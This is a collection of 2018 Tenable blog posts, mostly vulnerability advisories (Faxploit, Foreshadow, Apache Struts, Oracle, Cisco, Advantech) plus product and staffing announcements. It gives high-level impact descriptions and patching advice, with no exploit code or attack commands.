• Testing, testing and testing some more to make sure the controls mentioned above have been implemented effectively and the data is secure.

Here at Tenable, I have researched five additional solutions you can use to evaluate the security of data stored in S3 buckets. These five solutions, when implemented correctly and incorporated into daily operational checklists, can help you quickly assess your organization’s cyber exposure in the public cloud and help you determine next steps for securing your business-critical data.

• Amazon Macie: Automates data discovery and classification. Uses Artificial Intelligence to classify data files on S3 by leveraging a rules engine that identifies application data, correlates file extensions and predictable data themes, with strong regex matching to determine data type, cloud trail events, errors and basic alerts.
• Security Monkey: An open source bootstrap solution on github provided by Netflix. This implements monitoring, alerting and an auditable history of Cloud configurations across S3, IAM, Security Groups, Route 53, ELBs and SQS services.
• Amazon Trusted Advisor: Helps perform multiple other functions apart from identifying insecure buckets.
• Amazon S3 Inventory Tool: Provides either a CSV or ORC which further aids in auditing the replication and encryption status of objects in S3.
• Custom S3 bucket scanning solutions: Scripts available on github can be used to scan and check specific S3 buckets. These include kromtech’s S3-Inspector and sa7mon’s S3Scanner. In addition, avineshwar’s slurp clone monitors certstream and enumerates s3 buckets from each domain.

With the business demanding speed and ease of use, we expect to see the continued evolution of applications, systems and infrastructure away from on-premises data centers secured behind highly segregated networks to cloud-based “X-as-a-Service” architectures. The solutions and guidance highlighted above will help you identify security gaps in your environment and bootstrap solutions to automate resolution, alerting and auditing, thereby helping you meet your organization's Corporate Information Security Policies and Standards.

Learn more:

• How to Secure Public Cloud and DevOps? Get Unified Visibility
• How to Secure and Audit an Amazon Web Services Three-tier Web Architecture
• Reducing Cyber Exposure from Cloud to Containers

A new exploit demonstrated by Checkpoint Research at DEF CON last week leverages vulnerabilities in all-in-one printers, potentially allowing attackers to take control of other devices on the network.

Background

Checkpoint Research published a proof of concept (PoC) for exploiting two remote code execution vulnerabilities on HP All-in-One printers solely through the printer’s fax line. These critical vulnerabilities score CVSS v3 as 9.8 and include CVE-2018-5924 and CVE-2018-5925.

Checkpoint was able to embed malicious code disguised as a JPEG image, which then exploited buffer overflows in the processing code to gain full access to the printer’s operating system. From there, they were able to check if the printer was connected to a local area network (LAN), and use EternalBlue and Double Pulsar attacks to take control of a separate device on the network.

Vulnerability details

In its report, Checkpoint says it believes this is the first publicly documented example of the EternalBlue and Double Pulsar exploits being used to launch attacks via a printer. EternalBlue is a publicly available module that exploits a remote code execution bug in SMBv1. Double Pulsar is a kernel-level malware usually delivered through the EternalBlue exploit, allowing an attacker to load malware onto the target. Checkpoint used these tools via the fax line on the target printer to infect a separate device on the same network.

At the time of this writing, the PoC only covers HP printers, but the researchers at Checkpoint seemed confident other manufacturers could be similarly exploited.

This video from Checkpoint shows the PoC in action.

Checkpoint worked closely with HP to get these vulnerabilities fixed and patched before disclosing their research to the public at DEF CON 26. This allowed HP to have public patches available a few days ahead of the public disclosure of the PoC. HP provides a support page to determine if your printers need to be updated.

Impact assessment

While faxes may seem outdated, they’re still widely used -- and in some cases are required -- by schools, government offices, medical facilities and manufacturing industries. A Shodan search for internet-facing HP printers in the affected families showed more than 50,000 printers worldwide. Google also shows approximately 300 million indexed fax numbers. All-in-one Printer/Fax machines have replaced a lot of older standalone faxes for many businesses, so it can be assumed a fair number of those indexed numbers belong to all-in-one printers.

We haven’t seen this attack attempted publicly yet. However, other researchers and malicious actors are likely to build their own exploit code now that this PoC has been publicly disclosed. An attacker would need to know the model of printer they’re exploiting and the office fax number, or they could go Faxploit fishing with just the listed fax numbers hoping to get a hit. A Shodan search will show any of the affected printers connected to the web. Attackers could cross reference this data with other public information to match up the printer with relevant fax numbers.

An attacker could utilize the foothold created by this exploit in order to further infect other devices in the target environment. While this exploit is likely too complicated for widespread attacks, it could be an ideal vector for targeted attacks.

Urgently required actions

If your business uses an an all-in-one fax/printer, we recommend updating the firmware to the latest version provided by the manufacturer. At the time of this writing, HP is the only vendor with a patch for this specific exploit. We recommend checking with printer vendor support channels to see if they’ve responded as well.

Below is a list of plugins Tenable has released to detect if the HP printers in your network are vulnerable. Tenable will continue to monitor the situation and provide updated protection as vendors provide updates.

Tenable Plugins

Learn more:

• Report from Checkpoint Research
• HP Support Page

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

A flaw in Intel’s Software Guard Extensions implementation allows an attacker to access data stored in memory of other applications running on the same host, without the need for privilege escalation.

Background

Researchers discovered a flaw in Intel’s Software Guard Extensions (SGX) implementation that opens up a new speculative execution attack called Foreshadow (CVE-2018-3615). In addition, Intel has discovered variants allowing for Foreshadow attacks against microprocessors, system management mode (SMM) code, operating systems and Hypervisor software. These variants have been dubbed Foreshadow-NG (CVE-2018-3620 and CVE-2018-3646).

Collectively, Intel has labeled all of the speculative execution side channel vulnerabilities as L1 Terminal Faults (L1TF). Red Hat Enterprise Linux, Microsoft and other vendors have adopted this name for Foreshadow and Foreshadow-NG.

Vulnerability details

Foreshadow allows an attacker to access the data stored in memory of other applications running on the same host without needing any privilege escalation. This enables the attacker to gain access to sensitive files, data, passwords, keys, etc. The proof-of-concept code for Foreshadow has not been released and researchers suspect there wouldn’t be a way to detect exploitation, should it happen.

Foreshadow-NG allows an attacker to access memory on any Virtual Machine hosted on the same cloud, making it a high-severity issue. According to the Foreshadow researcher’s abstract: “Foreshadow-NG is the first transient execution attack that fully escapes the virtual memory sandbox.” This also includes cloud environments, which could potentially mean asset owners are at risk from their digital neighbors. To make matters worse, the way SGX has been implemented, a single SGX-compromised machine can result in the entire ecosystem becoming tainted.

Based on the information currently available, AMD/ARM-based processors are believed to be unaffected by this flaw, as they don’t implement SGX.

Urgently required actions

We highly recommend reviewing and installing security updates from your operating system and virtualization vendors. Microsoft and Red Hat have released updates to mitigate the flaws in multiple ways and to different extents. These approaches include flushing of sensitive data, rendering sensitive data inaccessible, enhancing isolation between virtual processors and other strategies.

Identifying affected systems

Learn more:

• Foreshadow Publication
• Red Hat Advisory
• Microsoft Advisory
• Intel Advisory
• Cisco Advisory

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

A new vulnerability discovered in the Oracle Database JavaVM component can result in complete database compromise and shell access to the underlying server.

Background

Oracle released an out-of-band update to its flagship database product for an authenticated vulnerability in the JavaVM component. According to Oracle, the vulnerability "can result in complete compromise of the Oracle Database and shell access to the underlying server." The same issue was found and patched in the July 2018 critical patch update (CPU) but was not reported as a critical vulnerability for unspecified reasons.

Vulnerability details

According to Oracle, this vulnerability affects “...versions 11.2.0.4 and 12.2.0.1 on Windows. CVE-2018-3110 has a CVSS v3 base score of 9.9, and can result in complete compromise of the Oracle Database and shell access to the underlying server. CVE-2018-3110 also affects Oracle Database version 12.1.0.2 on Windows as well as Oracle Database on Linux and Unix, however patches for those versions and platforms were included in the July 2018 CPU.”

This vulnerability affects Windows Oracle databases via the “Oracle Net” protocol and requires a user with “Create Session” privileges for the JavaVM component. No credit was provided in the advisory and, as is often the case with many Oracle vulnerabilities, exploitation details are sparse.

Note: While CVE-2018-3004 from the July CPU appears to be related, as the same component is affected, Oracle has clarified that these CVEs are unrelated and the fix for CVE-2018-3110 was silently included in the July CPU for a subset of their product line in an effort to protect their customers.

Impact assessment

Because database authentication is required to exploit this vulnerability, the impact is lessened. However, the potential for complete database takeover means anyone with an Oracle database in their environment should take remediation steps immediately. In addition, enterprises running versions of Oracle DB which were patched for the July CPU are already protected.

Urgently required actions

If your business uses an Oracle database, we recommend updating immediately based on Oracle’s guidance

Tenable.io Vulnerability Management, Tenable.io Container Security, SecurityCenter and Nessus detect this vulnerability. Below is a list of plugins Tenable has released to determine if the Oracle databases in your environment are affected. Tenable will continue to monitor the situation and provide updated protection as required.

Learn more:

• Oracle Advisory
• Oracle Blog

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Tenable SecurityCenter 5.7 enhancements address the vulnerability management (VM) needs of today’s modern and highly mobile workforce.

As digitization continues and companies invest in a highly mobile workforce, it’s important they have a VM solution with automated, continuous and accurate visibility into their IT assets in order to meet their growing needs.

We recently shared how we’re invested in driving SecurityCenter innovation forward to support the growing needs of cybersecurity teams. As we continue on this path of innovation, we’re excited to share how we’re enhancing the platform with SecurityCenter 5.7. First, we’ve added a new mobile agent workforce feature to ensure proper correlation of IP addresses to assets. Next, we’ve updated the Common Vulnerability Scoring System used by the platform. These enhancements distinguish SecurityCenter as the VM solution to help cybersecurity professionals efficiently prioritize security risks and provide a clear view of their organization's security posture.

Mobile Agent Workforce

In today’s highly dynamic environment, a single IP address no longer uniquely identifies an asset. For example, my laptop’s IP address changes as it moves from my home office to the corporate network and then to a hotel. If vulnerability scans are performed when my laptop is connected at these different locations, my laptop would be identified as three different devices and create a separate record for each identified device.

The Mobile Agent Workforce feature in SecurityCenter 5.7 ensures proper correlation of IP addresses to assets. Assets with Nessus Agents installed are each assigned a unique UUID. Each IP address will be properly mapped to the unique UUID and its corresponding asset, giving users an accurate understanding of their inventory and the ability to create precise remediation lists.

Fig. 1

Fig. 1: Mobile Agent Workforce feature in SecurityCenter 5.7 ensures proper correlation of IP addresses to assets with a new agent repository type for agent scan data.

CVSS v3

Information security professionals continuously perform risk assessments of their environment to focus remediation efforts on the areas with the biggest security risk. Proper prioritization of remediation efforts depends a great deal on the metrics used to assess risk.

The main method SecurityCenter uses to assess risk is the Common Vulnerability Scoring System (CVSS). To advance the clarity, consistency and accuracy of scores for modern-day vulnerabilities, SecurityCenter 5.7 will pull vulnerability information from CVSS v3, the latest version of CVSS. This latest version includes additional attributes, such as scope and user interaction, to accurately reflect the severity and impact of a vulnerability in a customer's environment.

Fig. 2

Fig. 3

Figs. 2 and 3: CVSS v3 provides clearer, more consistent and more accurate scores for modern- day vulnerabilities.

SecurityCenter 5.7 is available now for customer download. Here's how to learn more:

• Current users can review the SecurityCenter 5.7 release notes, or the official documentation.
• To see SecurityCenter 5.7 for yourself, or speak with a Tenable sales representative, please request a demo.
• Visit our website for more about SecurityCenter, including whitepapers and reports.

Researchers at Semmle have disclosed a critical vulnerability in Apache Struts, similar to the vulnerability at the root of the Equifax breach. Our advice? Update now!

Background

Semmle researchers discovered and disclosed a remote code execution (RCE) vulnerability (CVE-2018-11776) in servers running Apache Struts that meet specific configuration requirements. According to Semmle, those requirements are:

• The alwaysSelectFullNamespace flag is set to true in the Struts configuration. (Note: this is automatically the case if your application uses the popular Struts Convention plugin.)
• The application’s Struts configuration file contains an <action ...> tag that does not specify the optional namespace attribute or specifies a wildcard namespace (e.g., “/*”).

This vulnerability also requires the version of Apache Struts to be Struts 2.3–Struts 2.3.34 or Struts 2.5–Struts 2.5.16. Upgrading to the latest version provided by Apache should mitigate your risk.

Impact assessment

If the above configuration requirements are met and your version of Apache Struts has not been updated to the recommended versions, then an attacker could take full control of the web application using Apache Struts.

Equifax saw a similar Apache Struts vulnerability (CVE-2017-5638) used in what has been called the most expensive data breach in history. Many web-based RCE vulnerabilities like this one are researched quickly, with publicly available exploits appearing in less than a few days after disclosure.

Vulnerability details

In Apache Struts, when the <action ...> tag doesn’t have a corresponding namespace attribute, the default redirectAction result type will pass unsanitized strings in an HTML request as commands.

In addition, <s:url …> tags without a preset action or value attribute can be manipulated by having malicious code injected into the missing attributes, which then get passed to Struts as executed commands.

Urgently required actions

Upgrade to Apache Struts version 2.3.35 or 2.5.17 as soon as possible.

Apache also states that the following configuration change can mitigate the vulnerability (this should be a temporary workaround until an organization can upgrade):

• Verify that you have a set namespace (if applicable) for your ‘all’ defined results in underlying configurations.
• Verify that you have a set value or action for all ‘url’ tags in your JSPs. Both are needed only when their upper action(s) configurations have no or wildcard namespace.

 Researchers at Semmle have suggested that other methods of attack could exist, and these configuration requirements may not prevent attack.

Identifying affected systems

The following active plugin is available for scanning. Tenable.io® Container Security can detect containers running versions of Apache Struts vulnerable to CVE-2018-11776.

Get more information

• Semmle's public disclosure
• Researcher Man Yue Mo's technical explanation of the vulnerability
• Apache's advisory
• NVD entry for CVE-2018-11776

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Start your free trial of Tenable.io Container Security now!

The exploit -- which impacts the Advanced Local Procedure Call (ALPC) interface -- gives standard Windows users the ability to raise their privileges. Malware authors will no doubt be leveraging this capability to enhance their toolkits.

Background

On August 27, a security researcher made waves by releasing a working exploit on Github for a previously unknown, serious local privilege escalation (LPE) vulnerability in Microsoft Windows Scheduler.

The zero-day exploit, which was released via a Twitter post, allows a privileged attacker to obtain full SYSTEM access on fully patched Windows 10 and Windows Server 2016 systems. Other platforms may also be affected.

Vulnerability details

This public exploit impacts the Advanced Local Procedure Call (ALPC) interface in the Microsoft Windows scheduler. It has been verified by Tenable and Will Dormann from CERT Research to work on fully patched Windows 10 and Windows Server 2016 systems. Because exploits like this are extremely dangerous in the wrong hands, Microsoft maintains a bug bounty program and has been known to pay researchers handsomely for responsible disclosure.

Impact assessment

Security professionals should track this situation and respond as soon as a patch or mitigation is available. This exploit not only gives standard Windows users the ability to raise their privileges, but malware authors will no doubt be leveraging this capability to enhance their toolkit.

Urgently required actions

Users should remain alert and use security best practices such as a robust password policy, malware mitigation, access control and network segmentation. Apply Microsoft patches as soon as they become available. Monitoring for unusual processes on the system, as well as anomalous behavior of users, might also help identify compromised systems.

Tenable is closely monitoring this situation and will provide updated protection as soon as patches become available.

Learn more:

• Cert Advisory
• Public Github exploit

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Dayal’s appointment to this newly created role demonstrates Tenable’s strong, ongoing commitment to the India and SAARC region.

Today, I’m delighted to announce the appointment of Diwakar Dayal to the newly created role of Managing Director, Tenable India and the South Asian Association of Regional Cooperation (SAARC) region. Dayal will oversee strategic direction, channel expansion and sales growth for Tenable in the region.

Dayal brings exceptional leadership skills and is well versed in building a partner network within India. His knowledge of the region and his decades of industry experience make him a valued addition to our team. Dayal’s leadership will be invaluable as we continue to expand in India, educate customers about Cyber Exposure -- the emerging discipline for managing and measuring cybersecurity risk in the digital era -- and provide them with the continuous monitoring and vulnerability management technology they need to overcome today’s evolving threats.

In the new role, Dayal will drive business development throughout India and the SAARC region and optimize sales strategies to meet market demands and help customers use products, new features and services to their best advantage.

Diwakar Dayal, Managing Director, Tenable India and SAARC.

Prior to joining Tenable, Dayal held various positions at Cisco for over eight years, building a strong security sales team in India, and more recently managing the security channel sales team across Asia Pacific, Japan & Greater China, based out of Singapore.

Dayal previously worked for Juniper, leading the company’s advanced technology portfolio while creating its entry into the Indian FSI market. Prior to that, he spent time at Dimension Data, Wipro and Sify, driving the security consulting, solutions and integration business. He earned a Master of Business Administration (MBA) in Marketing from T A Pai Management Institute (TAPMI) and completed his CISSP (Certified Information Systems Security Professional) in 2004. A passionate cybersecurity enthusiast, Dayal is based in Bangalore, India.

Please join me in welcoming Dayal to the team.

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

In August, Tenable Research voted to highlight CVE-2018-2893 in Oracle WebLogic Server because it was almost immediately exploited by multiple threat actors.

Novelty, sophistication or just plain weirdness are some of the potential criteria we use to select the Tenable vulnerability of the month. We collect nominations from our 70+ research team members, shortlist the finalists and give the entire team the chance to vote – combining the total experience and knowledge of Tenable Research to identify the vulnerability of the month.

Background

CVE-2018-2893 caught our researchers’ attention this month. It allows for remote, unauthenticated attacks and received a CVSSv3 score of 9.8. While the vulnerability was patched in the Oracle Critical Patch Update on July 17, researchers saw exploitation in the wild of this vulnerability as early as July 21. Two separate groups were seen exploiting this vulnerability in large-scale attacks in the days following disclosure, likely fueled by publication of multiple proofs of compromise.

What makes this the vulnerability of the month?

The quick turnaround between disclosure of the vulnerability and exploitation in the wild is worth noting. While it may take months for some vulnerabilities to have a public exploit, some are valuable enough to warrant almost immediate exploitation. Our recent report, Quantifying the Attacker’s First-Mover Advantage, found that 34% of the most prevalent vulnerabilities had an exploit available on the same day they were disclosed publicly.

Vulnerabilities in WebLogic servers have become quite common (there have been nine disclosed so far in 2018, with CVSSv2 scores ranging from 5.8–7.5), and threat actors have been increasingly targeting them in the last year, particularly for mining cryptocurrency. While Oracle has been releasing patches to address these vulnerabilities as they are discovered and disclosed, more than once researchers have found ways to bypass the fixes, further complicating the issue. CVE-2018-2893 continues a vulnerability trend that shows no sign of changing.

The value of cryptomining is a strong motivator for criminals to target these vulnerabilities. In addition to cryptomining, Oracle WebLogic servers are frequently connected to systems containing sensitive data, such as intellectual property or personally identifiable information (PII), which could be tempting targets for attackers.

Vulnerability details

A recently patched flaw discovered in the WebLogic Server Core Components subcomponent of Oracle Weblogic allows a remote, unauthenticated attacker to take complete control over a host. The vulnerability is caused by unsafe deserialization of Java objects, an attack vector that’s been in the news several times in recent years. Using a crafted request over the T3 protocol, an attacker can execute arbitrary code on an affected WebLogic server, leading up to full control over that host. Reports have surfaced on social media suggesting there are ways to bypass the patch and continue to exploit a vulnerable host. However, this is yet to be confirmed by Oracle.

Additional information

• Security Week article, “Recently Patched Oracle WebLogic Flaw Exploited in the Wild”
• SANS ISC InfoSec Forum post, “Weblogic Exploit Code Made Public (CVE-2018-2893)”

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Cisco has released advisories for 29 issues, including three critical vulnerabilities. The update also includes a patch for CVE-2018-11776 in Apache Struts.

Background

On Wednesday, September 5, Cisco released security advisories for 29 issues, rating three of them as critical. One of these critical vulnerabilities is the Apache Struts vulnerability (CVE-2018-11776) that we wrote about last month. The other two critical vulnerabilities affect Cisco’s Umbrella API (CVE-2018-0435) and several Cisco wireless VPN devices (CVE-2018-0423).

Vulnerability details

While exploitation of the Struts vulnerability is the same as reported in our previous blog, this advisory indicates that the Cisco Identity Services Engine (ISE) is affected.

The Cisco Umbrella API vulnerability, when exploited, could allow an authenticated remote attacker to read and modify data. This vulnerability has already been patched by Cisco and no user action is required.

By exploiting the third critical vulnerability in Cisco wireless VPN devices, a remote attacker sending malicious requests to vulnerable devices can trigger a buffer overflow, which could lead to a Denial of Service (DoS) or execution of arbitrary code. In order to exploit this vulnerability, both the remote management interface and Guest account features must be enabled. However, both of these features are disabled by default.

Urgently required actions

For Cisco ISE users, the related bug and patch information can be found here.

For users with affected Cisco wireless VPN devices, we recommend users update to the latest version of the firmware for the devices, which can be found in Cisco’s software center.

Identifying affected systems

Tenable has released the following plugins related to these advisories.

Get more information

• Cisco Critical Advisories for September 5, 2018
• Tenable Blog Post: New Apache Struts Vulnerability Could Allow for Remote Code Execution
• Cisco Advisory: Umbrella API Unauthorized Access Vulnerability
• Cisco Advisory: CVE-2018-0423
• Cisco Software Center

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Tenable Researcher Chris Lyne discovered that Advantech WebAccess versions 8.3, 8.3.1 and 8.3.2 are still vulnerable to remote command execution CVE-2017-16720, which was originally disclosed by ZDI in January 2018 and has a public exploit.

Background

Tenable Research’s Chris Lyne has discovered that Advantech WebAccess remains unprotected against a public exploit several months after a patch was released. Vulnerable WebAccess instances remain susceptible to an unauthenticated remote code execution (RCE) attack (CVE-2017-16720). WebAccess versions 8.3, 8.3.1 and 8.3.2 are affected.

On January 4, 2018, ICS-CERT released ICSA-18-004-02A to detail several vulnerabilities reported for Advantech WebAccess. One of the vulnerabilities, CVE-2017-16720, which was also disclosed by the Zero Day Initiative (ZDI), allows an unauthenticated remote attacker to execute arbitrary system commands.

The mitigation section of the ICS-CERT advisory states, “Advantech has released WebAccess Version 8.3 to address the reported vulnerabilities.” In March, two months after the release of the ICS-CERT advisory, a public exploit leveraging CVE-2017-16720 was published to the Exploit Database.

Vulnerability details

This vulnerability allows for remote command execution via the Remote Procedure Call (RPC) protocol over TCP port 4592. By utilizing malicious Distributed Computing Environment / Remote Procedure Calls (DCERPC), the webvrpcs.exe service will pass command line instructions to the host.

The webvrpcs.exe service runs with administrator access rights, which means an attacker can take control of an asset at that privilege level.

Exploitation

There is a publicly available Proof of Concept (PoC) for this vulnerability. Little additional research would be required for an attacker to utilize this PoC against any WebAccess target.

Since this vulnerability was not previously patched, and a public exploit has been available for quite some time, up-to-date assets running WebAccess could have been exploited.

Vendor response

ICS-CERT indicates Advantech has a fix that will be released in September. We will update this section as we get more information, and remediation information becomes available.

Identifying Affected Systems

Tenable has the following plugin available for identifying vulnerable assets.

Learn more:

• Visit the Tenable Techblog on Medium to read researcher Chris Lyne's in-depth story about his work uncovering this vulnerability.
• Visit the Tenable Research Advisories page to stay up-to-date on security vulnerabilities in third-party software discovered by a dedicated team supported by researchers and engineers at Tenable.

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.